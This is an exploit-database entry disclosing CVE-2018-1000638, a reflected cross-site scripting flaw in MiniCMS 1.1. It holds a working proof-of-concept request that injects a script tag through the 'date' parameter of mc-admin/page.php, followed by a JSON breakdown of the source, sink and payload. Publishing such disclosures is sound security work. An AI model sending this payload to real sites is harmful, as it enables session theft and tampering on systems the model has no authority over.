Exploit for MiniCMS 1.1 Cross Site Scripting CVE-2018-1000638

Name: Exploit for MiniCMS 1.1 Cross Site Scripting CVE-2018-1000638
Rating: 5 (100 reviews)

2025-04-11 | CVSS 6.1

## https://sploitus.com/exploit?id=PACKETSTORM:190429
# Exploit Title: [MiniCMS 1.1 Cross-Site Scripting (XSS) in date Parameter of mc-admin/page.php]
    # Date: [2024-10-26]
    # Exploit Author: [CodeSecLab]
    # Vendor Homepage: [https://github.com/bg5sbk/MiniCMS]
    # Software Link: [https://github.com/bg5sbk/MiniCMS]
    # Version: [1.10] 
    # Tested on: [Ubuntu Windows]
    # CVE : [CVE-2018-1000638]
    
    PoC: 
    GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>
    
    Details:
    { "Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>" }
    
    [Replace Your Domain Name]